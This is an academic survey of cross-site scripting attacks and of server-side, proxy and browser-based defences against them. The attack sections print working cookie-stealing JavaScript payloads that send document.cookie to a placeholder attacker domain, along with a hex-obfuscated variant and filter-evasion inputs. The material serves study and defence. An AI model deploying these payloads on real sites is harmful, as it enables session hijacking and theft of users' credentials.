Abstract. Web applications are becoming truly pervasive in all kinds of business models and organizations. Today, most critical systems, such as those related to health care, banking, or even emergency response, rely on these applications. They must therefore include, in addition to the expected value offered to their users, reliable mechanisms to ensure their security. In this paper, we focus on the specific problem of cross-site scripting attacks against web applications. We present a study of this kind of attack and survey current approaches for its prevention. The applicability and limitations of each proposal are also discussed.
1 Introduction

The web paradigm is becoming an increasingly common strategy for application software companies [9]. It allows the design of pervasive applications that can potentially be used by thousands of customers from simple web clients. Moreover, new technologies that improve web features (e.g., Ajax [10]) allow software engineers to conceive new tools that are no longer restricted to specific operating systems (such as web-based document processors [12], social network services [13], collaborative encyclopedias [40], and weblogs [41]).

However, the inclusion of effective security mechanisms in those web applications is an increasing concern [39]. Besides the expected value that the applications offer to their potential users, reliable mechanisms for protecting the data and resources associated with the web application should also be offered. Existing approaches to securing traditional applications are not always sufficient when addressing the web paradigm, and they often leave end users responsible for the protection of key aspects of a service. This situation must be avoided since, if not well managed, it could allow inappropriate uses of a web application and lead to a violation of its security requirements.

In this paper we focus on the specific case of Cross-Site Scripting attacks (XSS attacks for short) against the security of web applications. This attack relies on the injection of malicious code into a web application in order to compromise the trust relationship between a user and the web application's site. If the vulnerability is successfully exploited, the malicious user who injected the code may then bypass, for instance, the controls that guarantee the privacy of the application's users, or even the integrity of the application itself. Different types of XSS attacks and possible exploitation scenarios exist in the literature. We survey in this paper the two most representative XSS attacks that can actually affect current web applications, and we discuss existing approaches for their prevention, such as filtering of web content, analysis of scripts, and runtime enforcement of web browsers. Some alternative categorizations, both of the types of XSS attacks and of the prevention mechanisms, may be found in [14]. We discuss these approaches and their limitations, as well as their deployment and applicability.

The rest of this paper is organized as follows. In Section 2 we present our motivating problem in more detail and show some representative examples. We then survey related solutions in Section 3 and outline their main drawbacks. Finally, Section 4 closes the paper with a list of conclusions.

2 Cross-Site Scripting Attacks 

Cross-Site Scripting attacks (XSS attacks for short) are attacks against web applications in which an attacker gains control of a user's browser in order to execute a malicious script (usually HTML/JavaScript code) within the context of trust of the web application's site. As a result, if the embedded code is successfully executed, the attacker might then be able to access, passively or actively, any sensitive browser resource associated with the web application (e.g., cookies, session IDs, etc.). In the sequel we study two main types of XSS attacks: persistent and non-persistent XSS attacks (also referred to in the literature as stored and reflected XSS attacks, respectively).

2.1 Persistent XSS Attacks 

Before going further in this section, let us first introduce this type of attack by using the sample scenario shown in Figure 2. We can identify in this example the following elements: attacker (A), set of victims' browsers (V), vulnerable web application (VWA), malicious web application (MWA), trusted domain (TD), and malicious domain (MD). We split the whole attack into two main stages. In the first stage (cf. Figure 2, steps 1-4), user A (the attacker) registers with VWA and posts the following HTML/JavaScript code as message M_A:



<HTML>
<title>Welcome!</title>
Hi everybody! See that picture below, that's my city, well where I come from ...<BR>
<img src="city.jpg">
<script>
// Re-pointing the image to MD makes the browser request a URL that carries the page's cookies
document.images[0].src="http://www.malicious.domain/city.jpg?stolencookies="+document.cookie;
</script>
</HTML>



Fig. 1. Content of message M_A.

The complete HTML/JavaScript code within message M_A is then stored in VWA's repository (cf. Figure 2, step 4) at TD (trusted domain), where it remains ready to be displayed to any other VWA user. Then, in a second stage (cf. Figure 2, steps 5-12), for each victim v_i ∈ V that displays message M_A, the cookie holding v_i's identifier, stored within v_i's browser cookie repository and requested from the trust context (TD) of VWA, is sent to an external repository of stolen cookies located at MD (malicious domain). The information stored within this repository of stolen cookies may finally be used by the attacker to get into VWA by using other users' identities.
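The persistence described above can be illustrated with a minimal sketch of a hypothetical message board that stores posts verbatim and concatenates them into every page it serves. The names `repository`, `storeMessage` and `renderBoard` are illustrative assumptions, not part of VWA or of any real framework; the point is only that one stored post is replayed to every later viewer.

```javascript
// Hypothetical in-memory store standing in for VWA's message repository at TD.
const repository = [];

// First stage: the message is stored exactly as submitted (no validation, no encoding).
function storeMessage(author, body) {
  repository.push({ author, body });
}

// Second stage: every page view concatenates the stored bodies into raw HTML,
// so markup posted by one user (including <script> elements) reaches all viewers.
function renderBoard() {
  const items = repository
    .map((m) => `<li><b>${m.author}</b>: ${m.body}</li>`)
    .join("\n");
  return `<html><body><ul>\n${items}\n</ul></body></html>`;
}

// The attacker posts once...
storeMessage("A", '<img src="city.jpg"><script>/* cookie-stealing code */</script>');

// ...and each victim who later displays the board receives the script.
for (const victim of ["v1", "v2", "v3"]) {
  console.log(victim, renderBoard().includes("<script>")); // true for every viewer
}
```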

As we can see in the previous example, the malicious JavaScript code injected by the attacker into the web application is persistently stored in the application's data repository. In turn, when an application user loads the malicious code into the browser, and since the code is sent from the trust context of the application's web site, the user's browser allows the script to access its repository of cookies. Thus, the script is able to send the victim's sensitive information to the malicious context of the attacker, thereby circumventing the basic security policy of any JavaScript engine, which restricts data access to scripts that belong to the same origin where the information was set [7].
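The same origin check mentioned above compares the scheme, host and port of two URLs. The sketch below assumes, as a simplification, that an origin is exactly that triple (real browsers handle further cases, such as `document.domain` and opaque origins, and scope cookies by their own rules). It shows why the injected script is not stopped: it is delivered from TD, so its origin matches that of the page owning the cookies. The `/VWA/messages?id=42` path is hypothetical.

```javascript
// Simplified origin: (scheme, host, port). The URL parser normalises default
// ports to "", so "http://x/" and "http://x:80/" compare equal.
function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.hostname}:${u.port}`;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

const cookieOwner = "http://www.trusted.domain/VWA/";
const scriptSource = "http://www.trusted.domain/VWA/messages?id=42"; // hypothetical page at TD
const collector = "http://www.malicious.domain/city.jpg";

console.log(sameOrigin(cookieOwner, scriptSource)); // true: the injected script may read document.cookie
console.log(sameOrigin(cookieOwner, collector));    // false: a script served by MD could not read them itself
```

Note that the policy restricts which scripts may *read* the cookies, not where an image request may be sent; this is why the script of Fig. 1 can still ship them to MD.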

The use of the previous technique is not restricted to the stealing of browser data resources. We can imagine an extended JavaScript code in the message injected by the attacker which simulates, for instance, the user's logout from the application's web site and presents a false login form that stores the victim's credentials (such as login, password, secret questions/answers, and so on) in the malicious context of the attacker. Once the information has been gathered, the script can redirect the flow of the application back to its previous state, or use the stolen information to perform a legitimate login into the application's web site.

Fig. 2. Persistent XSS attack sample scenario.

Persistent XSS attacks are traditionally associated with message board web applications with weak input validation mechanisms. Some well-known real examples of persistent XSS attacks associated with this kind of application can be found in [43, 35, 36]. In October 2001, for example, a persistent XSS attack against Hotmail [26] was found [43]. In that attack, using a technique similar to the one shown in Figure 2, the remote attacker was able to steal the .NET Passport identifiers of Hotmail's users by collecting their associated browser cookies. Similarly, in October 2005, a well-known persistent XSS attack affecting the online social network MySpace [27] was used by the Samy worm [35, 1] to propagate itself across MySpace's user profiles. More recently, in November 2006, an online social network operated by Google, Orkut [13], was also affected by a similar persistent XSS attack. As reported in [36], Orkut was vulnerable to cookie stealing by simply posting the stealing script into the attacker's profile. Then, any other user viewing the attacker's profile was exposed, and their communities were transferred to the attacker's account.



2.2 Non-Persistent XSS Attacks 



In this section we survey a variation of the basic XSS attack described in the previous section. This second category, defined in this paper as non-persistent XSS attack (and also referred to in the literature as reflected XSS attack), exploits the vulnerability that appears in a web application when it uses information provided by the user to generate an outgoing page for that user. In this manner, instead of the malicious code being embedded by the attacker into a stored message, here the malicious code itself is directly reflected back to the user by means of a third-party mechanism. By using a spoofed email, for instance, the attacker can trick the victim into clicking a link that contains the malicious code. If so, that code is finally sent back to the user, but from the trusted context of the application's web site. Then, similarly to the attack scenario shown in Figure 2, the victim's browser executes the code within the application's trust domain, and may allow it to send associated information (e.g., cookies and session IDs) without violating the same origin policy of the browser's interpreter [34].
Fig. 3. Non-persistent XSS attack sample scenario.



Non-persistent XSS attacks are by far the most common type of XSS attack against current web applications, and are commonly combined with other techniques, such as phishing and social engineering [20], in order to achieve their objectives (e.g., stealing users' sensitive information, such as credit card numbers). Because of the nature of this variant, i.e., the fact that the code is not persistently stored in the application's web site and that third-party techniques are needed, non-persistent XSS attacks are often performed by skilled attackers and associated with fraud. The damage caused by these attacks can indeed be considerable.

We show in Figure 3 a sample scenario of a non-persistent XSS attack. We preserve in this second example the same elements we presented in the previous section, i.e., an attacker (A), a set of victims' browsers (V), a vulnerable web application (VWA), a malicious web application (MWA), a trusted domain (TD), and a malicious domain (MD). This second scenario can also be divided into two main stages. In the first stage (cf. Figure 3, steps 1-2), user v_i is somehow convinced (e.g., by a previous phishing attack through a spoofed email) to browse to MWA, and is then tricked into clicking the link embedded within the following HTML/JavaScript code:



<HTML>
<title>Welcome!</title>
Click on the following <a href='http://www.trusted.domain/VWA/<script>\
document.location="http://www.malicious.domain/city.jpg?stolencookies="+document.cookie;\
</script>'>link</a>.
</HTML>



When user v_i clicks on the link, the browser is redirected to VWA, requesting a page that does not exist at TD, and the web server at TD therefore generates an outgoing error page notifying that the resource does not exist. Let us assume, however, that because of a non-persistent XSS vulnerability within VWA, TD's web server returns the error message embedded within an HTML/JavaScript document, and that it also includes in that document the requested location, i.e., the malicious code, without encoding it (see footnote 3). In that case, instead of embedding the following encoded code:

&lt;script&gt;document.location="http://www.malicious.domain/city.jpg?\
stolencookies="+document.cookie;&lt;/script&gt;

it embeds the following one:

<script>document.location="http://www.malicious.domain/city.jpg?\
stolencookies="+document.cookie;</script>

3 A transformation process can be used to slightly reduce the odds of an attack, by simply replacing some special characters that the attacker could use to harm the web application (for instance, replacing the characters < and > by &lt; and &gt;).



If such a situation happens, v_i's browser will execute the previous code within the trust context of VWA at TD's site and, therefore, the cookie belonging to TD will be sent to the repository of stolen cookies of MWA at MD (cf. Figure 3, steps 3-6). The information stored within this repository can finally be used by the attacker to get into VWA by using v_i's identity.
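The difference between the two embedded snippets above comes down to whether the requested location is HTML-encoded before it is reflected. A minimal sketch, assuming a hypothetical `notFoundPage` handler at TD (not taken from any real server) and extending the replacement of footnote 3 to `&`, `"` and `'`, as is common practice:

```javascript
// Replaces the characters that let reflected text break out into markup.
// '&' is handled first so the entities produced below are not re-escaped.
function encodeHtml(text) {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hypothetical 404 handler that echoes the requested location back to the user.
function notFoundPage(requestedPath, { encode }) {
  const shown = encode ? encodeHtml(requestedPath) : requestedPath;
  return `<html><body>The resource ${shown} does not exist.</body></html>`;
}

// Path requested when v_i follows the link from MWA (already URL-decoded by the server).
const requested =
  '/VWA/<script>document.location="http://www.malicious.domain/city.jpg?stolencookies="+document.cookie;</script>';

const vulnerable = notFoundPage(requested, { encode: false });
const encoded = notFoundPage(requested, { encode: true });

console.log(vulnerable.includes("<script>")); // true: the browser would run it in TD's context
console.log(encoded.includes("<script>"));    // false: shown as inert text
```

This encoding only protects text placed in an HTML body; values reflected into attributes, URLs or script blocks need context-specific rules, which is one reason the footnote speaks of only slightly reducing the odds of an attack.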

The example shown above is inspired by real-world scenarios, such as the attacks reported in [6, 16, 28, 29]. In [6, 16], for instance, the authors reported in November 2005 and July 2006 some non-persistent XSS vulnerabilities in Google's web search engine. Although those vulnerabilities were fixed in a reasonably short time, they show how even a stable web application such as Google's web search engine had been allowing attackers to inject malicious versions of legitimate pages into its search results in order to steal sensitive information through non-persistent XSS attacks. The author of [28, 29] goes even further, claiming in June/July 2006 that the e-payment web application PayPal [32] had probably been allowing attackers to steal sensitive data (e.g., credit card numbers) from its members for more than two years until PayPal's developers fixed the XSS vulnerability.

3 Prevention Techniques 

Although web application development has evolved considerably since the first cases of XSS attacks were reported, such attacks are still being exploited day after day. Since the late 1990s, attackers have continued to exploit XSS vulnerabilities across Internet web applications even though these applications were protected by traditional network security techniques, such as firewalls and cryptography-based mechanisms. The use of specific secure development techniques can help to mitigate the problem. However, they are not always enough. For instance, secure coding practices (e.g., those proposed in [18]) and/or secure programming models (e.g., the model proposed in [11] to detect anomalous execution situations) are often limited to traditional applications, and might not be useful when addressing the web paradigm. Furthermore, general mechanisms for input validation often focus on numeric information or bounds checking (e.g., the proposals presented in [24, 8]), while the prevention of XSS attacks must also address the validation of input strings.

This situation shows the inadequacy of using basic security recommendations as the sole measures to guarantee the security of web applications, and leads to the need for additional security mechanisms to cope with XSS attacks when those basic security measures have been evaded. In this section we present specific approaches intended for the detection and prevention of XSS attacks. We have structured the presentation of these approaches into two main categories: analysis and filtering of the exchanged information, and runtime enforcement of web browsers.

3.1 Analysis and Filtering of the Exchanged Information 

Most, if not all, current web applications that allow the use of rich content when exchanging information between the browser and the web site implement basic content filtering schemes in order to counter both persistent and non-persistent XSS attacks. This basic filtering can easily be implemented by defining a list of accepted characters and/or special tags; the filtering process then simply rejects everything not included in that list. Alternatively, and in order to improve the filtering process, encoding processes can also be used to make dangerous characters and/or tags less harmful. However, we consider these basic strategies too limited and easy for skilled attackers to evade [17].
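The basic whitelist scheme described above can be sketched as follows. The accepted character set and tag list are arbitrary assumptions chosen for illustration, not taken from any surveyed system. The last call shows why such schemes are considered limited: whatever the whitelist lets through (here, the `<img>` tag) can still carry active content through its attributes.

```javascript
// Hypothetical whitelist: letters, digits, some punctuation, and the tags below.
const ALLOWED_CHARS = /^[A-Za-z0-9 .,!?'"=\/<>():_-]*$/;
const ALLOWED_TAGS = new Set(["b", "i", "br", "img"]);

// Accepts the input only if every character and every tag name is whitelisted.
function passesWhitelist(input) {
  if (!ALLOWED_CHARS.test(input)) return false;
  const tagNames = [...input.matchAll(/<\/?\s*([A-Za-z0-9]+)/g)].map((m) =>
    m[1].toLowerCase()
  );
  return tagNames.every((t) => ALLOWED_TAGS.has(t));
}

console.log(passesWhitelist("Hi <b>everybody</b>!"));            // true
console.log(passesWhitelist("<script>alert(1)</script>"));       // false: tag not allowed
console.log(passesWhitelist('<img src=x onerror="alert(document.cookie)">')); // true: evaded via an attribute
```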

The use of policy-based strategies has also been reported in the literature. For instance, the authors in [37] propose a proxy server intended to be placed at the web application's site in order to filter both incoming and outgoing data streams. Their filtering process takes into account a set of policy rules defined by the web application's developers. Although their technique is an important improvement over the basic mechanisms pointed out above, this approach still presents important limitations. First, we believe that its lack of analysis of syntactic structures may be exploited by skilled attackers to evade the detection mechanisms and hide malicious queries; filters based on simple regular expressions can clearly be evaded. Second, the semantics of the policy language proposed in their work is not clearly reported and, to our knowledge, its use for defining general filtering rules for any possible application/browser pair seems non-trivial and probably error-prone. Third, placing the filtering proxy at the server side can quickly introduce performance and scalability limitations for the application's deployment.
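To illustrate why filters built on simple regular expressions are easy to evade, here is a hypothetical blacklist rule (not the policy language of [37]) that strips `<script>` elements, followed by inputs that slip past it. The `stillDangerous` test is itself only a crude stand-in for "the output can still execute code".

```javascript
// Naive rule: remove anything that looks like <script>...</script>.
function stripScripts(html) {
  return html.replace(/<script>.*?<\/script>/g, "");
}

const attempts = [
  "<script>steal()</script>",                   // caught
  "<SCRIPT>steal()</SCRIPT>",                   // upper case: not matched
  "<script >steal()</script >",                 // extra whitespace: not matched
  "<scr<script></script>ipt>steal()</script>",  // removal reassembles a tag
  '<img src="x" onerror="steal()">',           // no script element at all
];

for (const a of attempts) {
  const out = stripScripts(a);
  const stillDangerous = /<script|onerror=/i.test(out);
  console.log(stillDangerous ? "EVADED " : "blocked", JSON.stringify(out));
}
```

Only the first input is neutralized; the nested case is instructive because the single-pass removal itself produces a fresh `<script>` element.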

More recent server-based filtering proxies for similar purposes have also been reported in [33, 38]. In [33], a filtering proxy is intended to be placed at the server side of a web application in order to separate trusted and untrusted traffic into different channels. To do so, the authors propose a fine-grained taint analysis to perform the partitioning process. Moreover, they show how they implemented their proposal by manually modifying a PHP interpreter at the server side to track, for each string, the information that has previously been tainted. The main limitation of this approach is that a web application implemented in a different language cannot be protected by it, or will require third-party tools, e.g., language wrappers. The proposed technique therefore depends on its runtime environment, which clearly limits its portability. Moreover, managing this proposal remains non-trivial for any possible application/browser pair, and potentially error-prone. Similarly, the authors in [38] propose a syntactic criterion to filter out malicious data streams. Their solution efficiently analyzes queries and detects misuses, wrapping the malicious statement to prevent the final stage of an attack. The authors also implemented the approach and conducted experiments with five real-world scenarios, blocking the malicious content in all of them without generating any false positives. However, their approach seems aimed at helping programmers eliminate vulnerabilities at the server side from early development stages, rather than at client-side protection. Furthermore, this approach remains language-dependent, and its management does not currently seem to be a trivial task.
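The fine-grained taint idea behind [33] can be sketched at the application level, rather than inside a modified PHP interpreter as the authors did: every string carries a per-character taint mark, concatenation preserves the marks, and the output sink encodes only the tainted characters. The `TaintedString` class and the `emit` sink are hypothetical and do not reproduce the authors' implementation.

```javascript
// A string whose characters each carry a taint flag (true = came from the request).
class TaintedString {
  constructor(text, taint) {
    this.text = text;
    this.taint = taint; // one boolean per UTF-16 code unit of text
  }
  static trusted(text) {
    return new TaintedString(text, Array(text.length).fill(false));
  }
  static untrusted(text) {
    return new TaintedString(text, Array(text.length).fill(true));
  }
  // Concatenation keeps each character's mark, so taint survives string building.
  concat(other) {
    return new TaintedString(this.text + other.text, this.taint.concat(other.taint));
  }
}

const ENTITIES = { "<": "&lt;", ">": "&gt;", "&": "&amp;", '"': "&quot;", "'": "&#39;" };

// Output sink: trusted characters pass unchanged, tainted special characters are encoded.
function emit(ts) {
  let out = "";
  for (let i = 0; i < ts.text.length; i++) {
    const c = ts.text[i];
    out += ts.taint[i] && ENTITIES[c] ? ENTITIES[c] : c;
  }
  return out;
}

const page = TaintedString.trusted("<p>Results for: ")
  .concat(TaintedString.untrusted("<script>steal()</script>"))
  .concat(TaintedString.trusted("</p>"));

console.log(emit(page));
// <p>Results for: &lt;script&gt;steal()&lt;/script&gt;</p>
```

The developer's own markup (`<p>`) survives while the request-supplied markup does not; doing this transparently for every string in every language runtime is exactly where the portability concern above arises.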

Similar solutions also propose the inclusion of these filtering and/or analysis processes at the client side, such as [23, 19]. In [23], on the one hand, a client-side filtering method is proposed for the prevention of XSS attacks by preventing victims' browsers from contacting malicious URLs. In this approach, the authors differentiate good and bad URLs by blacklisting links embedded within the web application's pages. In this manner, redirections to URLs associated with those blacklisted links are rejected by the client-side proxy. We consider this method insufficient to either detect or prevent complex XSS attacks. Only basic XSS attacks based on same-origin violations [34] might be detected by using blacklisting methods. Alternative XSS techniques, such as the one used in [1, 35], or any other vulnerability not due to input validation, may be used to circumvent such a prevention mechanism. The authors in [19], on the other hand, present another client-based proxy that analyzes the data exchanged between the browser and the web application's server. Their analysis process is intended to detect malicious requests reflected from the attacker to the victim (e.g., the non-persistent XSS attack scenario presented in Section 2.2). If a malicious request is detected, the characters of the request are re-encoded by the proxy in an attempt to prevent the attack from succeeding. Clearly, the main limitation of this approach is that it can only be used to prevent non-persistent XSS attacks; and, similarly to the previous approach, it only addresses attacks based on HTML/JavaScript technologies.
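A client-side URL blacklist of the kind described for [23] reduces to a host lookup before each outgoing request. The sketch below uses a hypothetical blacklist and a hypothetical second collector host (`www.other-malicious.domain`); it also makes the limitation discussed above concrete, since a request back to the trusted site itself (the Samy worm of [1, 35], for instance, spread through requests to MySpace) never touches a blacklisted host.

```javascript
// Hypothetical blacklist maintained by the client-side proxy.
const BLACKLISTED_HOSTS = new Set(["www.malicious.domain"]);

// Decides whether the proxy lets the browser contact a URL.
// The URL parser already lower-cases host names of http(s) URLs.
function allowRequest(url) {
  return !BLACKLISTED_HOSTS.has(new URL(url).hostname);
}

// Exfiltration to a known bad host is stopped...
console.log(allowRequest("http://www.malicious.domain/city.jpg?stolencookies=x")); // false
// ...but an unlisted collector, or a request back to the trusted site, is not.
console.log(allowRequest("http://www.other-malicious.domain/c?x"));                // true
console.log(allowRequest("http://www.trusted.domain/VWA/profile?update=worm"));     // true
```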

To sum up, we consider that although filtering- and analysis-based proposals are the standard defense mechanism and the most widely deployed technique to date, they present important limitations for the detection and prevention of complex XSS attacks on current web applications. Even if we agree that such filtering and analysis mechanisms may be simple to propose in theory, we consider their deployment very complicated in practice (especially in applications with heavy client-side processing, such as Ajax-based applications [10]). First, the use of both filtering and analysis proxies, especially at the server side, introduces important limitations regarding the performance and scalability of a given web application. Second, malicious scripts might be embedded within the exchanged documents in a heavily obfuscated form (e.g., by encoding the malicious code in hexadecimal or with more advanced encoding methods) in order to appear less suspicious to those filters and analyzers. Finally, even if most well-known XSS attacks are written in JavaScript and embedded into HTML documents, other technologies, such as Java, Flash, ActiveX, and so on, can also be used [31]. For this reason, it seems very difficult to us to conceive a general filtering- and/or analysis-based process able to cope with every possible misuse of such languages.
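The obfuscation argument can be made concrete with a hypothetical signature that looks for the literal text `document.cookie`. The same expression written as `window["document"]["cookie"]`, with the property names spelled using hexadecimal escape sequences, no longer contains that text. Even after the filter reproduces the interpreter's `\xNN` decoding, the bracket notation still hides the signature, which illustrates how much of the language a general filter would have to understand.

```javascript
// Naive signature used by a hypothetical filter.
const SIGNATURE = "document.cookie";
const matchesSignature = (code) => code.includes(SIGNATURE);

const plain = 'new Image().src="http://www.malicious.domain/?c="+document.cookie';
// In a browser this reads the same value: window["document"]["cookie"], hex-escaped.
const obfuscated =
  'new Image().src="http://www.malicious.domain/?c="+window["\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74"]["\\x63\\x6f\\x6f\\x6b\\x69\\x65"]';

// Decodes \xNN escapes the way a JavaScript string literal would.
function decodeHexEscapes(code) {
  return code.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

console.log(matchesSignature(plain));                                 // true
console.log(matchesSignature(obfuscated));                            // false
console.log(decodeHexEscapes(obfuscated).includes('window["document"]["cookie"]')); // true
console.log(matchesSignature(decodeHexEscapes(obfuscated)));          // false
```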

3.2 Runtime Enforcement of Web Browsers 

Alternative proposals to the analysis and filtering of web content on either server- 
or client-based proxies, such as [15, 22, 21], try to eliminate the need for inter- 
mediate elements by proposing strategies for the enforcement of the runtime 
context of the end-point, i.e., the web browser. 

In [15], for example, the authors propose an auditing system for the JavaScript interpreter of the Mozilla web browser. Their auditing system is based on an intrusion detection system that detects misuses during the execution of JavaScript operations and takes proper countermeasures to avoid violations of the browser's security (e.g., an XSS attack). The main idea behind their approach is the detection of situations where the execution of a JavaScript script involves the abuse of browser resources, e.g., the transfer of cookies associated with the web application's site to untrusted parties, thereby violating the same origin policy of the web browser. The authors present in their work the implementation of this approach and evaluate the overhead introduced in the browser's interpreter. This overhead appears to increase significantly with the number of operations performed by the script. For this reason, we note scalability limitations of this approach when analyzing non-trivial JavaScript-based routines. Moreover, their approach can only be applied to the prevention of JavaScript-based XSS attacks. To our knowledge, no further development has been undertaken by the authors to handle the auditing of other interpreters, such as Java, Flash, etc.
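The detection rule at the heart of the auditing approach of [15], flagging operations that would carry TD's cookies to another origin, can be approximated by a monitor through which every outgoing request of a script passes. The sketch below is a hypothetical simplification (a content match on the cookie value, not the authors' intrusion detection engine); the `checks` counter hints at where per-operation overhead comes from, since every audited operation costs one check.

```javascript
// Hypothetical audit monitor: every network operation issued by a script passes through it.
class RequestAuditor {
  constructor(pageUrl, cookie) {
    this.pageOrigin = new URL(pageUrl).origin;
    this.cookie = cookie;
    this.checks = 0; // grows with the number of audited operations
    this.alerts = [];
  }

  // Returns true if the request may proceed.
  audit(targetUrl) {
    this.checks++;
    const target = new URL(targetUrl);
    let decoded;
    try {
      decoded = decodeURIComponent(target.href);
    } catch {
      decoded = target.href; // malformed %-escapes: inspect the raw URL
    }
    const crossOrigin = target.origin !== this.pageOrigin;
    const carriesCookie = this.cookie !== "" && decoded.includes(this.cookie);
    if (crossOrigin && carriesCookie) {
      this.alerts.push(targetUrl);
      return false; // counter-measure: block the transfer
    }
    return true;
  }
}

const auditor = new RequestAuditor("http://www.trusted.domain/VWA/", "sessionid=abc123");

auditor.audit("http://www.trusted.domain/VWA/img/logo.png");                          // allowed
auditor.audit("http://www.malicious.domain/city.jpg?stolencookies=sessionid=abc123"); // blocked
console.log(auditor.checks, auditor.alerts.length); // 2 1
```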

A different approach to auditing code execution, to ensure that the browser's resources are not abused, is the use of taint checking. An enhanced version of the JavaScript interpreter of the Mozilla web browser that applies taint checking can be found in [22]. Their checking approach follows the same line as the audit processes pointed out in the previous section for the analysis of script executions at the server side (e.g., at the web application's site or in an intermediate proxy), such as [37, 30, 42]. Similarly to the work presented in [15], but without the use of intrusion detection techniques, the proposal introduced in [22] uses a dynamic analysis of JavaScript code, performed by the browser's JavaScript interpreter and based on taint checking, in order to detect whether browser resources (e.g., session identifiers and cookies) are going to be transferred to an untrusted third party (i.e., the attacker's domain). If such a situation is detected, the user is warned and may decide whether the transfer should be accepted or refused.
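The taint-based variant replaces content matching with labels that follow data through the script. A minimal sketch, assuming values are wrapped in a hypothetical `Labeled` type (the interpreter in [22] tracks this internally and does not expose such an API): reading the cookie yields a tainted value, operations propagate the label, and a cross-origin send of a tainted value triggers the user prompt described above, modelled here as a callback. Flows that this kind of data-only tracking misses are what [22] covers with its complementary static analysis.

```javascript
// A value plus a taint flag.
class Labeled {
  constructor(value, tainted) {
    this.value = value;
    this.tainted = tainted;
  }
  // Any result computed from a tainted operand is itself tainted.
  concat(other) {
    return new Labeled(this.value + other.value, this.tainted || other.tainted);
  }
}

// Simulated browser context for a page served from TD.
function makeContext(pageOrigin, cookie, askUser) {
  return {
    readCookie: () => new Labeled(cookie, true), // sensitive source
    literal: (s) => new Labeled(s, false),
    // Sink: sending tainted data to another origin requires the user's consent.
    send(url) {
      const crossOrigin = new URL(url.value).origin !== pageOrigin;
      if (url.tainted && crossOrigin && !askUser(url.value)) return "refused";
      return "sent";
    },
  };
}

const userRefuses = () => false;
const ctx = makeContext("http://www.trusted.domain", "sessionid=abc123", userRefuses);

// Injected script: builds the exfiltration URL from the cookie.
const leak = ctx
  .literal("http://www.malicious.domain/city.jpg?stolencookies=")
  .concat(ctx.readCookie());
console.log(ctx.send(leak)); // refused
// An untainted cross-origin request is not interrupted.
console.log(ctx.send(ctx.literal("http://www.malicious.domain/ad.png"))); // sent
```

Passing `() => true` as `askUser` models the user who clicks through the warning, which is precisely the first drawback discussed next.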

Although the basic idea behind this last proposal is sound, we note important drawbacks. First, the protection implemented in the browser adds a layer of security that ultimately depends on the decision of the end user. Unfortunately, most web application users are not always aware of the risks we are surveying in this paper, and are likely to automatically accept the transfer requested by the browser. A second limitation of this proposal is that it cannot ensure that all the information flowing dynamically is going to be audited. To solve this situation, the authors in [22] have to complement their dynamic approach with a static analysis, which is invoked each time they detect that the dynamic analysis is not enough. Practically speaking, this limitation leads to scalability constraints when analyzing medium- and large-size scripts. It is therefore fair to conclude that it is their static analysis that determines the effectiveness and performance of their approach, which we consider too expensive for our motivating problem. Furthermore, like most of the proposals reported in the literature, this proposal still addresses only the case of JavaScript-based XSS attacks, although many other languages, such as Java, Flash, ActiveX, and so on, should also be considered.

A third approach to enforcing web browsers against XSS attacks is presented in [21], in which the authors propose a policy-based management where a list of actions (e.g., either accept or refuse a given script) is embedded within the documents exchanged between server and client. By following this set of actions, the browser can later decide, for instance, whether a script should be executed or refused by the browser's interpreter, or whether a browser resource can be manipulated by a further script. As pointed out by the authors of [21], their proposal presents some analogies with host-based intrusion detection techniques, not just because it executes a local monitor that detects program misuses but, more importantly, because it defines allowable behaviors by means of whitelisted scripts and sandboxes. However, we believe that their approach tends to be too restrictive, especially when using sandboxes to isolate browser resources, which we consider can directly or indirectly affect different portions of the same document and clearly impair the usability of the application. We also note a lack of semantics in the policy language presented in [21], as well as in the mechanism proposed for the exchange of policies.
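A policy embedded in the exchanged document, as in [21], can be pictured as a whitelist of approved scripts plus a set of sandboxed regions in which no script runs. The sketch below is a hypothetical simplification with an invented policy format: it compares script text directly, whereas a practical design would more likely compare cryptographic digests. It also shows the usability concern raised above, since a legitimate script placed inside a sandboxed region is refused as well.

```javascript
// Hypothetical policy shipped by the server together with the page.
const policy = {
  allowedScripts: new Set(["showClock();", "initMenu();"]),
  sandboxedRegions: new Set(["user-comments"]),
};

// Browser-side check performed before executing each script element.
function mayExecute(scriptText, regionId, pol) {
  if (pol.sandboxedRegions.has(regionId)) return false; // no scripts inside sandboxes
  return pol.allowedScripts.has(scriptText.trim());
}

console.log(mayExecute("initMenu();", "header", policy)); // true
console.log(
  mayExecute('document.location="http://www.malicious.domain/?c="+document.cookie;', "header", policy)
); // false: not whitelisted
console.log(mayExecute("showClock();", "user-comments", policy)); // false: legitimate but sandboxed
```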

3.3 Summary and Comments on Current Prevention Techniques

We consider that the surveyed proposals are not mature enough and should still evolve in order to properly handle our problem domain. Moreover, we believe it is necessary to reach an agreement between server- and browser-based solutions in order to efficiently mitigate the risk of XSS in current web applications. Even if we accept that the enforcement of web browsers presents clear advantages compared with either server- or client-based proxy solutions (e.g., it avoids the bottleneck and scalability problems that arise when both analysis and filtering of the exchanged information are performed by an intermediate proxy on either the server or the client side), we consider that the set of actions to be enforced by the browser must be clearly defined and specified at the server side, and later enforced at the client side (i.e., deployed from the web server and enforced by the web browser). Additional aspects, such as the authentication of both sides before the exchange of policies and the set of mechanisms for the protection of resources at the client side, should also be considered. We are indeed working in this direction, in order to conceive and deploy a policy-based enforcement of web browsers using XACML policies specified at the server side and exchanged between client and server through X.509 certificates and the SSL protocol. Due to space limitations, we do not cover this work in the paper. However, a technical report on its design and key points is going to be published soon.

4 Conclusion 

The increasing use of the web paradigm for the development of pervasive applications is opening new security threats against the infrastructures behind such applications. Web application developers must consider the use of support tools to guarantee a deployment free of vulnerabilities, such as secure coding practices [18], secure programming models [11] and, especially, construction frameworks for the deployment of secure web applications [25]. However, attackers continue to devise new strategies to exploit web applications. The significance of such attacks is underscored by the pervasive presence of web applications in, for instance, critical systems in industries such as health care, banking, government administration, and so on.

